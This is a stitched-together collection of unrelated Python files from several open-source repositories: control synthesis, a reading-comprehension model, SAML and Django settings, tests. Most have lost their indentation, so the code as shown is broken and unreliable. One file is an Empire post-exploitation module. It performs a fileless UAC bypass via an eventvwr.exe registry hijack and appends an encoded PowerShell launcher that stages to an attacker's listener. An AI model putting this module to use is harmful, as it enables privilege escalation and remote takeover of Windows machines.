if len(P_start) > 1:
# Take convex hull
vert = pc.extreme(P_start[0])
for i in range(1, len(P_start)):
vert = np.hstack([
vert,
pc.extreme(P_start[i])
])
P1 = pc.qhull(vert)
else:
P1 = P_start[0]
else:
P1 = P_start
else:
# Take original proposition preserving cell as constraint
P1 = original_regions[orig[start]]
# must be convex (therefore single polytope?)
if len(P1) > 0:
if len(P1) == 1:
P1 = P1[0]
else:
                print(P1)
raise Exception("conservative = False flag requires "
"original regions to be convex")
if len(P_end) > 0:
low_cost = np.inf
low_u = np.zeros([N,m])
# for each polytope in target region
for P3 in P_end:
if mid_weight > 0:
rc, xc = pc.cheby_ball(P3)
R[
np.ix_(
range(n*(N-1), n*N),
range(n*(N-1), n*N)
)
] += mid_weight*np.eye(n)
r[idx, :] += -mid_weight*xc
try:
u, cost = get_input_helper(
x0, ssys, P1, P3, N, R, r, Q,
closed_loop=closed_loop
)
r[idx, :] += mid_weight*xc
            except Exception:
                # QP infeasible for this target polytope: undo the r
                # adjustment and try the next one.
r[idx, :] += mid_weight*xc
continue
if cost < low_cost:
low_u = u
low_cost = cost
if low_cost == np.inf:
raise Exception("get_input: Did not find any trajectory")
else:
P3 = P_end
if mid_weight > 0:
rc, xc = pc.cheby_ball(P3)
R[
np.ix_(
range(n*(N-1), n*N),
range(n*(N-1), n*N)
)
] += mid_weight*np.eye(n)
r[idx, :] += -mid_weight*xc
low_u, cost = get_input_helper(
x0, ssys, P1, P3, N, R, r, Q,
closed_loop=closed_loop
)
if test_result:
good = is_seq_inside(x0, low_u, ssys, P1, P3)
if not good:
print("Calculated sequence not good")
return low_u
def get_input_helper(
x0, ssys, P1, P3, N, R, r, Q,
closed_loop=True
):
"""Calculates the sequence u_seq such that:
- x(t+1) = A x(t) + B u(t) + K
- x(k) \in P1 for k = 0,...N
- x(N) \in P3
- [u(k); x(k)] \in PU
and minimizes x'Rx + 2*r'x + u'Qu
"""
n = ssys.A.shape[1]
m = ssys.B.shape[1]
list_P = []
if closed_loop:
temp_part = P3
list_P.append(P3)
for i in xrange(N-1,0,-1):
temp_part = solve_feasible(
P1, temp_part, ssys, N=1,
closed_loop=False, trans_set=P1
)
list_P.insert(0, temp_part)
list_P.insert(0,P1)
L,M = createLM(ssys, N, list_P, disturbance_ind=[1])
else:
list_P.append(P1)
for i in xrange(N-1,0,-1):
list_P.append(P1)
list_P.append(P3)
L,M = createLM(ssys, N, list_P)
# Remove first constraint on x(0)
L = L[range(list_P[0].A.shape[0], L.shape[0]),:]
M = M[range(list_P[0].A.shape[0], M.shape[0]),:]
# Separate L matrix
Lx = L[:,range(n)]
Lu = L[:,range(n,L.shape[1])]
M = M - Lx.dot(x0).reshape(Lx.shape[0],1)
# Constraints
G = matrix(Lu)
h = matrix(M)
B_diag = ssys.B
for i in xrange(N-1):
B_diag = _block_diag2(B_diag,ssys.B)
K_hat = np.tile(ssys.K, (N,1))
A_it = ssys.A.copy()
A_row = np.zeros([n, n*N])
A_K = np.zeros([n*N, n*N])
A_N = np.zeros([n*N, n])
for i in xrange(N):
A_row = ssys.A.dot(A_row)
A_row[np.ix_(
range(n),
range(i*n, (i+1)*n)
)] = np.eye(n)
A_N[np.ix_(
range(i*n, (i+1)*n),
range(n)
)] = A_it
A_K[np.ix_(
range(i*n,(i+1)*n),
range(A_K.shape[1])
)] = A_row
A_it = ssys.A.dot(A_it)
Ct = A_K.dot(B_diag)
P = matrix(Q + Ct.T.dot(R).dot(Ct) )
q = matrix(
np.dot(
np.dot(x0.reshape(1, x0.size), A_N.T) +
A_K.dot(K_hat).T, R.dot(Ct)
) +
r.T.dot(Ct)
).T
sol = solvers.qp(P, q, G, h)
if sol['status'] != "optimal":
raise Exception("getInputHelper: "
"QP solver finished with status " +
str(sol['status'])
)
u = np.array(sol['x']).flatten()
cost = sol['primal objective']
return u.reshape(N, m), cost
def is_seq_inside(x0, u_seq, ssys, P0, P1):
"""Checks if the plant remains inside P0 for time t = 1, ... N-1
and that the plant reaches P1 for time t = N.
Used to test a computed input sequence.
No disturbance is taken into account.
@param x0: initial point for execution
@param u_seq: (N x m) array where row k is input for t = k
@param ssys: dynamics
@type ssys: L{LtiSysDyn}
@param P0: C{Polytope} where we want x(k) to remain for k = 1, ... N-1
@return: C{True} if x(k) \in P0 for k = 1, .. N-1 and x(N) \in P1.
C{False} otherwise
"""
N = u_seq.shape[0]
x = x0.reshape(x0.size, 1)
A = ssys.A
B = ssys.B
if len(ssys.K) == 0:
K = np.zeros(x.shape)
else:
K = ssys.K
inside = True
for i in xrange(N-1):
u = u_seq[i,:].reshape(u_seq[i, :].size, 1)
x = A.dot(x) + B.dot(u) + K
if not pc.is_inside(P0, x):
inside = False
un_1 = u_seq[N-1,:].reshape(u_seq[N-1, :].size, 1)
xn = A.dot(x) + B.dot(un_1) + K
if not pc.is_inside(P1, xn):
inside = False
return inside
def find_discrete_state(x0, part):
"""Return index identifying the discrete state
to which the continuous state x0 belongs to.
Notes
=====
1. If there are overlapping partitions
(i.e., x0 belongs to more than one discrete state),
then return the first discrete state ID
@param x0: initial continuous state
@type x0: numpy 1darray
@param part: state space partition
@type part: L{PropPreservingPartition}
@return: if C{x0} belongs to some
discrete state in C{part},
then return the index of that state
Otherwise return None, i.e., in case
C{x0} does not belong to any discrete state.
@rtype: int
"""
for (i, region) in enumerate(part):
if pc.is_inside(region, x0):
return i
return None
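# Usage sketch (hypothetical values):
#   i = find_discrete_state(np.array([0.3, 1.2]), abstraction.ppp)
#   if i is not None:
#       u = get_input(np.array([0.3, 1.2]), ssys, abstraction, i, end=j)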
| necozay/tulip-control | tulip/abstract/find_controller.py | Python | bsd-3-clause | 14,468 |
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-EventVwrBypass',
'Author': ['@enigma0x3'],
'Description': ("Bypasses UAC by performing an image hijack on the .msc file extension and starting eventvwr.exe. "
"No files are dropped to disk, making this opsec safe."),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'MinPSVersion' : '2',
'Comments': [
'https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/',
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
listenerName = self.options['Listener']['Value']
# staging options
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Invoke-EventVwrBypass.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
if launcher == "":
print helpers.color("[!] Error in launcher generation.")
return ""
else:
script += "Invoke-EventVwrBypass -Command \"%s\"" % (launcher)
return script
| pierce403/EmpirePanel | lib/modules/privesc/bypassuac_eventvwr.py | Python | bsd-3-clause | 3,893 |
if __name__ == '__main__':
    from views import app  # importing views also registers its routes
app.run(debug=True)
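    # Flask's development server listens on http://127.0.0.1:5000/ by
    # default; debug=True enables the reloader and interactive debugger,
    # so it should stay off in production.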
| fxa90id/up-flask-forum | flask-forum.py | Python | bsd-3-clause | 76 |
# Modified by CNSL
# 1) including TDNN based char embedding
# 06/02/17
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
import torch
import torch.nn as nn
from . import layers
from .tdnn import TDNN
from .highway import Highway
import torch.nn.functional as F
import pdb
class RnnDocReader(nn.Module):
"""Network for the Document Reader module of DrQA."""
RNN_TYPES = {'lstm': nn.LSTM, 'gru': nn.GRU, 'rnn': nn.RNN}
def __init__(self, opt, padding_idx=0, padding_idx_char=0):
super(RnnDocReader, self).__init__()
# Store config
self.opt = opt
#Cudnn
#if not opt['use_cudnn']:
# torch.backends.cudnn.enabled=False
# Word embeddings (+1 for padding), usually initialized by GloVE
self.embedding = nn.Embedding(opt['vocab_size'],
opt['embedding_dim'],
padding_idx=padding_idx)
# Char embeddings (+1 for padding)
#pdb.set_trace()
if opt['add_char2word']:
self.char_embedding = nn.Embedding(opt['vocab_size_char'],
opt['embedding_dim_char'],
padding_idx=padding_idx_char)
self.char_embedding.weight = nn.Parameter(torch.Tensor(opt['vocab_size_char'],opt['embedding_dim_char']).uniform_(-1,1))
self.TDNN = TDNN(opt)
if opt['nLayer_Highway'] > 0 :
self.Highway = Highway(opt['embedding_dim'] + opt['embedding_dim_TDNN'], opt['nLayer_Highway'], F.relu)
# ...(maybe) keep them fixed (word only)
if opt['fix_embeddings']:
for p in self.embedding.parameters():
p.requires_grad = False
# Register a buffer to (maybe) fill later for keeping *some* fixed
if opt['tune_partial'] > 0:
buffer_size = torch.Size((
opt['vocab_size'] - opt['tune_partial'] - 2,
opt['embedding_dim']
))
self.register_buffer('fixed_embedding', torch.Tensor(buffer_size))
# Projection for attention weighted question
if opt['use_qemb']:
if opt['add_char2word']:
self.qemb_match = layers.SeqAttnMatch(opt['embedding_dim'] + opt['embedding_dim_TDNN'])
else:
self.qemb_match = layers.SeqAttnMatch(opt['embedding_dim'])
# Input size to RNN: word emb + question emb + manual features
if opt['add_char2word']:
doc_input_size = opt['embedding_dim'] + opt['num_features'] + opt['embedding_dim_TDNN']
else:
doc_input_size = opt['embedding_dim'] + opt['num_features']
if opt['use_qemb']:
if opt['add_char2word']:
doc_input_size += opt['embedding_dim'] + opt['embedding_dim_TDNN']
else:
doc_input_size += opt['embedding_dim']
#pdb.set_trace()
# RNN document encoder
self.doc_rnn = layers.StackedBRNN(
input_size=doc_input_size,
hidden_size=opt['hidden_size'],
num_layers=opt['doc_layers'],
dropout_rate=opt['dropout_rnn'],
dropout_output=opt['dropout_rnn_output'],
concat_layers=opt['concat_rnn_layers'],
rnn_type=self.RNN_TYPES[opt['rnn_type']],
padding=opt['rnn_padding'],
)
# RNN question encoder
q_input_size = opt['embedding_dim']
if opt['add_char2word']:
q_input_size += opt['embedding_dim_TDNN']
self.question_rnn = layers.StackedBRNN(
input_size=q_input_size,
hidden_size=opt['hidden_size'],
num_layers=opt['question_layers'],
dropout_rate=opt['dropout_rnn'],
dropout_output=opt['dropout_rnn_output'],
concat_layers=opt['concat_rnn_layers'],
rnn_type=self.RNN_TYPES[opt['rnn_type']],
padding=opt['rnn_padding'],
)
# Output sizes of rnn encoders
doc_hidden_size = 2 * opt['hidden_size']
question_hidden_size = 2 * opt['hidden_size']
if opt['concat_rnn_layers']:
doc_hidden_size *= opt['doc_layers']
question_hidden_size *= opt['question_layers']
# Question merging
if opt['question_merge'] not in ['avg', 'self_attn']:
            raise NotImplementedError('question_merge = %s' % opt['question_merge'])
if opt['question_merge'] == 'self_attn':
self.self_attn = layers.LinearSeqAttn(question_hidden_size)
# Q-P matching
opt['qp_rnn_size'] = doc_hidden_size + question_hidden_size
if opt['qp_bottleneck']:
opt['qp_rnn_size'] = opt['hidden_size_bottleneck']
self.qp_match = layers.GatedAttentionBilinearRNN(
x_size = doc_hidden_size,
y_size = question_hidden_size,
hidden_size= opt['qp_rnn_size'],
padding=opt['rnn_padding'],
rnn_type=self.RNN_TYPES[opt['rnn_type']],
birnn=opt['qp_birnn'],
concat = opt['qp_concat'],
gate=True
)
qp_matched_size = opt['qp_rnn_size']
if opt['qp_birnn']:
qp_matched_size = qp_matched_size * 2
if opt['qp_concat']:
qp_matched_size = qp_matched_size + doc_hidden_size
## PP matching:
#pdb.set_trace()
opt['pp_rnn_size'] = qp_matched_size * 2
if opt['pp_bottleneck']:
opt['pp_rnn_size'] = opt['hidden_size_bottleneck']
self.pp_match = layers.GatedAttentionBilinearRNN(
x_size = qp_matched_size,
y_size = qp_matched_size,
hidden_size= opt['pp_rnn_size'],
padding=opt['rnn_padding'],
rnn_type=self.RNN_TYPES[opt['rnn_type']],
birnn=opt['pp_birnn'],
concat = opt['pp_concat'],
gate=opt['pp_gate'],
rnn=opt['pp_rnn'],
                       identity=opt['pp_identity']
)
pp_matched_size = opt['pp_rnn_size']
if opt['pp_birnn'] and opt['pp_rnn']:
pp_matched_size = pp_matched_size * 2
if opt['pp_concat']:
pp_matched_size = pp_matched_size + qp_matched_size
# Bilinear attention for span start/end
if opt['task_QA']:
self.start_attn = layers.BilinearSeqAttn(
pp_matched_size,
question_hidden_size
)
self.end_attn = layers.BilinearSeqAttn(
pp_matched_size,
question_hidden_size
)
# Paragraph Hierarchical Encoder
if opt['ans_sent_predict'] :
self.meanpoolLayer = layers.Selective_Meanpool(doc_hidden_size)
self.sentBRNN = layers.StackedBRNN(
input_size=pp_matched_size,
hidden_size=opt['hidden_size_sent'],
num_layers=opt['nLayer_Sent'],
concat_layers=False,
rnn_type=self.RNN_TYPES[opt['rnn_type']],
padding=opt['rnn_padding_sent'],
)
self.sentseqAttn = layers.BilinearSeqAttn(
opt['hidden_size_sent'],
question_hidden_size,
)
#def forward(self, x1, x1_f, x1_mask, x2, x2_mask, x1_c, x1_c_mask, x2_c, x2_c_mask):
#def forward(self, x1, x1_f, x1_mask, x2, x2_mask, x1_c=None, x2_c=None): # for this version, we do not utilize mask for char
def forward(self, x1, x1_f, x1_mask, x2, x2_mask, x1_c=None, x2_c=None, x1_sent_mask=None, word_boundary=None): # for this version, we do not utilize mask for char
#pdb.set_trace()
"""Inputs:
x1 = document word indices [batch * len_d]
x1_f = document word features indices [batch * len_d * nfeat]
x1_mask = document padding mask [batch * len_d] ==>
x2 = question word indices [batch * len_q]
x2_mask = question padding mask [batch * len_q] ==>
x1_c = document char indices [batch * len_d * max_char_per_word]
x1_c_mask = document char padding mask [batch * len_d * max_char_per_word] --> not implemented in this version
x2_c = question char indices [batch * len_q * max_char_per_word]
x2_c_mask = question char padding mask [batch * len_q * max_char_per_word] --> not implemented in this version
"""
# Embed both document and question
batch_size = x1.size()[0]
doc_len = x1.size()[1]
ques_len = x2.size()[1]
x1_emb = self.embedding(x1) # N x Td x D
x2_emb = self.embedding(x2) # N x Tq x D
if self.opt['add_char2word']:
max_wordL_d = x1_c.size()[2]
max_wordL_q = x2_c.size()[2]
x1_c = x1_c.view(-1, max_wordL_d)
x2_c = x2_c.view(-1, max_wordL_q)
x1_c_emb = self.char_embedding(x1_c)
x2_c_emb = self.char_embedding(x2_c)
x1_c_emb = x1_c_emb.view(batch_size,
doc_len,
max_wordL_d,
-1)
x2_c_emb = x2_c_emb.view(batch_size,
ques_len,
max_wordL_q,
-1)
# Produce char-aware word embed
x1_cw_emb = self.TDNN(x1_c_emb) # N x Td x sum(H)
x2_cw_emb = self.TDNN(x2_c_emb) # N x Tq x sum(H)
# Merge word + char
x1_emb = torch.cat((x1_emb, x1_cw_emb), 2)
x2_emb = torch.cat((x2_emb, x2_cw_emb), 2)
###x1_mask = torch.cat([x1_mask, x1_c_mask], 2) # For this version, we do not utilize char mask
###x2_mask = torch.cat([x2_mask, x2_c_mask], 2) # For this version, we do not utilize char mask
# Highway network
if self.opt['nLayer_Highway'] > 0:
[batch_size, seq_len, embed_size] = x1_emb.size()
x1_emb = self.Highway(x1_emb.view(-1, embed_size))
x1_emb = x1_emb.view(batch_size, -1, embed_size)
[batch_size, seq_len, embed_size] = x2_emb.size()
x2_emb = self.Highway(x2_emb.view(-1, embed_size))
x2_emb = x2_emb.view(batch_size, -1, embed_size)
        else:
            # Without char embeddings, the x1_c/x2_c argument slots are
            # reused to carry the sentence mask and word boundaries that
            # the sentence-prediction branch below expects.
            if ('x1_c' in locals()) and ('x2_c' in locals()):
                #pdb.set_trace()
                x1_sent_mask = x1_c
                word_boundary = x2_c
# Dropout on embeddings
if self.opt['dropout_emb'] > 0:
x1_emb = nn.functional.dropout(x1_emb, p=self.opt['dropout_emb'], training=self.training)
x2_emb = nn.functional.dropout(x2_emb, p=self.opt['dropout_emb'], training=self.training)
# Add attention-weighted question representation
#pdb.set_trace()
if self.opt['use_qemb']:
x2_weighted_emb = self.qemb_match(x1_emb, x2_emb, x2_mask)
drnn_input = torch.cat([x1_emb, x2_weighted_emb, x1_f], 2)
else:
drnn_input = torch.cat([x1_emb, x1_f], 2)
# Encode document with RNN
doc_hiddens = self.doc_rnn(drnn_input, x1_mask)
#pdb.set_trace()
# Encode question with RNN
question_hiddens = self.question_rnn(x2_emb, x2_mask)
# QP matching
qp_matched_doc = self.qp_match(doc_hiddens, x1_mask, question_hiddens, x2_mask)
# PP matching
if not qp_matched_doc.is_contiguous():
qp_matched_doc = qp_matched_doc.contiguous()
pp_matched_doc = self.pp_match(qp_matched_doc, x1_mask, qp_matched_doc, x1_mask)
#print(pp_matched_doc.size())
#pdb.set_trace()
# Merge question hiddens
if self.opt['question_merge'] == 'avg':
q_merge_weights = layers.uniform_weights(question_hiddens, x2_mask)
elif self.opt['question_merge'] == 'self_attn':
q_merge_weights = self.self_attn(question_hiddens, x2_mask)
question_hidden = layers.weighted_avg(question_hiddens, q_merge_weights)
return_list = []
# Predict start and end positions
if self.opt['task_QA']:
start_scores = self.start_attn(pp_matched_doc, question_hidden, x1_mask)
end_scores = self.end_attn(pp_matched_doc, question_hidden, x1_mask)
return_list = return_list + [start_scores, end_scores]
# Pooling , currently no multi-task learning
if self.opt['ans_sent_predict']:
sent_hiddens = self.meanpoolLayer(pp_matched_doc, word_boundary)
if self.opt['nLayer_Sent'] > 0:
sent_hiddens = self.sentBRNN(sent_hiddens, x1_sent_mask)
sent_scores = self.sentseqAttn(sent_hiddens, question_hidden, x1_sent_mask)
return_list = return_list + [sent_scores]
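        # return_list layout (sketch): [start_scores, end_scores] when
        # task_QA is on, each of shape (batch, len_d); sent_scores is
        # appended when ans_sent_predict is on.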
return return_list
| calee88/ParlAI | parlai/agents/drqa_msmarco/rnet.py | Python | bsd-3-clause | 13,354 |
"""
Django Settings that more closely resemble SAML Metadata.
Detailed discussion is in doc/SETTINGS_AND_METADATA.txt.
"""
from importlib import import_module

from django.conf import settings
from django.core.exceptions import ImproperlyConfigured


def get_metadata_config(request):
"""
Get Metadata based on configuration in settings.
Options are:
- SAML2IDP_REMOTES & SAML2IDP_CONFIG present in settings
- SAML2IDP_CONFIG_FUNCTION will be used to get REMOTES and CONFIG
per request. Dynamic way of loading configuration.
:return: Tuple holding SAML2IDP_CONFIG, SAML2IDP_REMOTES
"""
if hasattr(settings, 'SAML2IDP_CONFIG_FUNCTION'):
# We have a dynamic configuration.
config_func = import_function_from_str(
settings.SAML2IDP_CONFIG_FUNCTION)
if not config_func:
raise ImproperlyConfigured(
'Cannot import SAML2IDP_CONFIG_FUNCTION')
# Return SAML2IDP_CONFIG & SAML2IDP_REMOTES
return config_func(request)
elif (hasattr(settings, 'SAML2IDP_CONFIG') and
hasattr(settings, 'SAML2IDP_REMOTES')):
# We have static configuration!
return settings.SAML2IDP_CONFIG, settings.SAML2IDP_REMOTES
raise ImproperlyConfigured('Cannot load SAML2IDP configuration!')
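
# A minimal sketch of the two configuration styles this function accepts;
# the setting names come from the code above, the values are illustrative
# assumptions:
#
#     # Static configuration in settings.py:
#     SAML2IDP_CONFIG = {'issuer': 'https://idp.example.com'}
#     SAML2IDP_REMOTES = {'my_sp': {'acs_url': 'https://sp.example.com/acs'}}
#
#     # Or a dynamic hook, resolved per request:
#     SAML2IDP_CONFIG_FUNCTION = 'myproject.saml.get_config'
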
def import_function_from_str(func):
"""
Import function from string.
:param func: Can be a string or a function
"""
if isinstance(func, str):
# function supplied as a string
mod_str, _, func_str = func.rpartition('.')
        try:
            mod = import_module(mod_str)
            return getattr(mod, func_str)
        except (ImportError, AttributeError):
            # Swallow lookup failures; callers treat None as "not importable".
            return None
return func
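
# Example usage with a hypothetical dotted path:
#
#     config_func = import_function_from_str('myproject.saml.get_config')
#     if config_func is not None:
#         config, remotes = config_func(request)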
| Awingu/django-saml2-idp | saml2idp/saml2idp_metadata.py | Python | bsd-3-clause | 1,746 |
# ----------------------------------------------------------------------------
# Copyright (c) 2016-2020, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
import unittest
import qiime2
import qiime2.sdk
class TestUtil(unittest.TestCase):
def test_artifact_actions(self):
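        # Passing None as the input type should match no actions.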
obs = qiime2.sdk.util.actions_by_input_type(None)
self.assertEqual(obs, [])
        # For simplicity, we only compare the names of the plugin and
        # its actions
obs = [(x.name, [yy.name for yy in y])
for x, y in qiime2.sdk.util.actions_by_input_type('SingleInt')]
exp = [('dummy-plugin', [
'Do stuff normally, but override this one step sometimes'])]
self.assertEqual(obs, exp)
obs = [(x.name, [yy.name for yy in y])
for x, y in qiime2.sdk.util.actions_by_input_type(
'Kennel[Cat]')]
self.assertEqual(obs, [])
obs = [(x.name, [yy.name for yy in y])
for x, y in qiime2.sdk.util.actions_by_input_type(
'IntSequence1')]
exp = [('dummy-plugin', [
'A typical pipeline with the potential to raise an error',
'Concatenate integers', 'Identity', 'Identity', 'Identity',
'Do a great many things', 'Identity', 'Identity', 'Identity',
'Visualize most common integers',
'Split sequence of integers in half',
'Test different ways of failing', 'Optional artifacts method',
'Do stuff normally, but override this one step sometimes'])]
self.assertEqual(len(obs), 1)
self.assertEqual(obs[0][0], exp[0][0])
self.assertCountEqual(obs[0][1], exp[0][1])
if __name__ == '__main__':
unittest.main()
| thermokarst/qiime2 | qiime2/sdk/tests/test_util.py | Python | bsd-3-clause | 1,934 |
default_app_config = 'userlog.apps.UserLogConfig'
__version__ = '0.2'
| aaugustin/django-userlog | userlog/__init__.py | Python | bsd-3-clause | 71 |
# -*- coding: utf-8 -*-
#
# Copyright (c) 2010-2011, Monash e-Research Centre
# (Monash University, Australia)
# Copyright (c) 2010-2011, VeRSI Consortium
# (Victorian eResearch Strategic Initiative, Australia)
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the VeRSI, the VeRSI Consortium members, nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE REGENTS AND CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from tardis.tardis_portal import models
from django.contrib import admin
admin.site.register(models.XML_data)
admin.site.register(models.XSLT_docs)
admin.site.register(models.Experiment)
admin.site.register(models.Dataset)
admin.site.register(models.Dataset_File)
admin.site.register(models.Schema)
admin.site.register(models.ParameterName)
admin.site.register(models.DatafileParameter)
admin.site.register(models.DatasetParameter)
admin.site.register(models.Author_Experiment)
admin.site.register(models.UserProfile)
admin.site.register(models.ExperimentParameter)
admin.site.register(models.DatafileParameterSet)
admin.site.register(models.DatasetParameterSet)
admin.site.register(models.ExperimentParameterSet)
admin.site.register(models.GroupAdmin)
admin.site.register(models.UserAuthentication)
admin.site.register(models.ExperimentACL)
admin.site.register(models.Equipment)
| grischa/mytardis-mrtardis | tardis/tardis_portal/admin.py | Python | bsd-3-clause | 2,634 |
from django.conf.urls import patterns, include, url
urlpatterns = patterns(
'places.views',
url(r'^summary/(?P<place_slug>[^/]+)/$', 'summary'),
url(r'^profiles/(?P<place_slug>[^/]+)/$', 'profiles'),
url(r'^programs/(?P<place_slug>[^/]+)/$', 'programs'),
)
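
# Note: `patterns()` was deprecated in Django 1.8 and removed in 1.10; on a
# modern Django this module would be a plain list (sketch, same routes):
#
#     from places import views
#     urlpatterns = [
#         url(r'^summary/(?P<place_slug>[^/]+)/$', views.summary),
#         url(r'^profiles/(?P<place_slug>[^/]+)/$', views.profiles),
#         url(r'^programs/(?P<place_slug>[^/]+)/$', views.programs),
#     ]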
| MAPC/masshealth | places/urls.py | Python | bsd-3-clause | 275 |